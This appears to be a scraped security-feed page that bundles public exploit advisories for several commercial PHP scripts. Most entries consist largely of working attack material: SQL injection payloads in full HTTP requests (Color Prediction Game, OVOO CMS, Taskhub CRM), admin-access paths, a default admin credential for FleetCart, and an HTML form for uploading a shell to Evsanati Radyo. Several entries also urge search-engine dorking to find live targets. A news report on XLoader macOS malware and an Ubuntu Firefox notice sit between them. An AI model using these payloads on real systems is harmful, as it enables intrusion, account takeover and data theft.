Color Prediction Game version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Color Prediction Game v1.0 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /loginNow.php HTTP/1.1Host: localhostCookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------395879129218961020344050490865Content-Length: 434Origin: http://localhostReferer: http://localhost/login.phpSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: close-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--### Parameter & Payloads ###Parameter: MULTIPART login_mobile ((custom) POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: -----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_mobile"4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="login_password"123456-----------------------------395879129218961020344050490865Content-Disposition: form-data; name="action"login-----------------------------395879129218961020344050490865--

Color Prediction Game 1.0 SQL Injection

OVOO Movie Portal CMS version 3.3.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /filter_movies/1 HTTP/2Host: localhostCookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495usUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://localhost/movies.htmlContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 60Origin: htts://localhostSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1### Parameter & Payloads ###Parameter: maximum_rating (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND2238=2238&page=1Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1

OVOO Movie Portal CMS 3.3.3 SQL Injection

Taskhub CRM Tool version 2.8.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###GET /projects?filter=notstarted HTTP/1.1Host: localhostCookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: close### Parameter & Payloads ###Parameter: filter (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQOType: error-basedTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BYclause (EXTRACTVALUE)Payload: filter=notstarted' ANDEXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ

Taskhub CRM Tool 2.8.6 SQL Injection

FlightPath LMS version 4.8.2 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v4.8.2 Insecure Direct Object Reference Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  | # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference vulnerability that allows an unauthorized administrative access.[+] Use payload : /tools/course-search/[+] http://127.0.0.1/getflightpathcom/sites/getflightpath/demo/4x/flightpath/tools/course-searchGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 4.8.2 Insecure Direct Object Reference

FleetCart Laravel Ecommerce System version 1.1.2 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : FleetCart - Laravel Ecommerce System v1.1.2 Insecure Settings Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826?s_rank=175                                 |  | # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Use Payload : Email: admin@email.com & Password: 123456 [+] Panel : https://127.0.0.1/kingamesro/admin/mediaGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FleetCart Laravel Ecommerce System 1.1.2 Insecure Settings

FixBook Repair Shop Management Tool version 2.2 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : FixBook - Repair Shop Management Tool v2.2 Password Hash Disclosure Vulnerability                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567                                           || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Open the source code of the page.[+] Go 2 line 49  found pass of databass encrypted . view-source:http://target_site/repair/update/[+] Here Update admin information : http://127.0.0.1/epbuys.co.uk/repair/update/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FixBook Repair Shop Management Tool 2.2 Hash Disclosure

A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."
"The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application

Malware / Endpoint Security

A new variant of an Apple macOS malware called **XLoader** has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."

"The new version of **XLoader** is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)."

XLoader, first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file.

"Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE with Macs over a decade ago," the cybersecurity firm noted at the time.

The latest iteration of XLoader gets around this limitation by switching to programming languages such as C and Objective C, with the disk image file signed on July 17, 2023. Apple has since revoked the signature.

SentinelOne said it detected multiple submissions of the artifact on VirusTotal all through the month of July 2023, indicating a widespread campaign.

"Advertisements on crimeware forums offer the Mac version for rental at $199/month or $299/3 months," the researchers said. "Interestingly, this is relatively expensive compared to Windows variants of XLoader, which go for $59/month and $129/3 months."

Once executed, OfficeNote throws an error message saying it "can't be opened because the original item can't be found," but, in reality, it installs a Launch Agent in the background for persistence.

XLoader is designed to harvest clipboard data as well as information stored in the directories associated with web browsers such as Google Chrome and Mozilla Firefox. Safari, however, is not targeted.

Besides taking steps to evade analysis both manually and by automated solutions, the malware is configured to run sleep commands to delay its execution and avoid raising any red flags.

"XLoader continues to present a threat to macOS users and businesses," the researchers concluded.

"This latest iteration masquerading as an office productivity application shows that the targets of interest are clearly users in a working environment. The malware attempts to steal browser and clipboard secrets that could be used or sold to other threat actors for further compromise."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Variant of XLoader macOS Malware Disguised as 'OfficeNote' Productivity App

Ubuntu Security Notice 6267-3 - USN-6267-1 fixed vulnerabilities and USN-6267-2 fixed minor regressions in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Max Vlasov discovered that Firefox Offscreen Canvas did not properly track cross-origin tainting. An attacker could potentially exploit this issue to access image data from another site in violation of same-origin policy. Alexander Guryanov discovered that Firefox did not properly update the value of a global variable in WASM JIT analysis in some circumstances. An attacker could potentially exploit this issue to cause a denial of service. Mark Brand discovered that Firefox did not properly validate the size of an untrusted input stream. An attacker could potentially exploit this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6267-3August 21, 2023firefox regressions==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:USN-6267-2 caused some minor regressions in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:USN-6267-1 fixed vulnerabilities and USN-6267-2 fixed minor regressions inFirefox. The update introduced several minor regressions. This update fixesthe problem.We apologize for the inconvenience.Original advisory details: Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. (CVE-2023-4047, CVE-2023-4048, CVE-2023-4049, CVE-2023-4051, CVE-2023-4053, CVE-2023-4055, CVE-2023-4056, CVE-2023-4057, CVE-2023-4058)  Max Vlasov discovered that Firefox Offscreen Canvas did not properly track cross-origin tainting. An attacker could potentially exploit this issue to access image data from another site in violation of same-origin policy. (CVE-2023-4045)  Alexander Guryanov discovered that Firefox did not properly update the value of a global variable in WASM JIT analysis in some circumstances. An attacker could potentially exploit this issue to cause a denial of service. (CVE-2023-4046)  Mark Brand discovered that Firefox did not properly validate the size of an untrusted input stream. An attacker could potentially exploit this issue to cause a denial of service. (CVE-2023-4050)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         116.0.3+build2-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6267-3  https://ubuntu.com/security/notices/USN-6267-1  https://launchpad.net/bugs/2032143Package Information:  https://launchpad.net/ubuntu/+source/firefox/116.0.3+build2-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6267-3

Fara Melk Estate CMS version 1.5.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : Fara Melk Estate CMS v1.5.0 unauthorized administrative access Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.20script.ir/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] unauthorized administrative access. allows users to access the administrative interface.[+] Use Payload : /admin-assets/tables.html#[+] http://127.0.0.1/fara/admin-assets/tables.html#Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Fara Melk Estate CMS 1.5.0 Information Disclosure

Evsanati Radyo version 1.0 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : evsanati radyo v1.0 Remote File Upload Vulnerability                                                               |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] infected file : /upload/yukle.php

[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them

[+] Some web sites have deleted the upload file so use this code ( note : use after login )

[+] line 5 set your target

<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
</head>

<form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data">

<div align="center">

<table border="0" cellspacing="0" cellpadding="0">  
  <tr>  
    <td><b>Resmi Secin :</b></td>  
    <td>&nbsp;<input type="file" name="dosya" size="20"></td>  
  </tr>  
  <tr>  
    <td></td>  
    <td><br /><input type="submit" value="Yukle" style="width:220px;"></td>  
  </tr>  
</table>

</div>

</form>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Tag

#firefox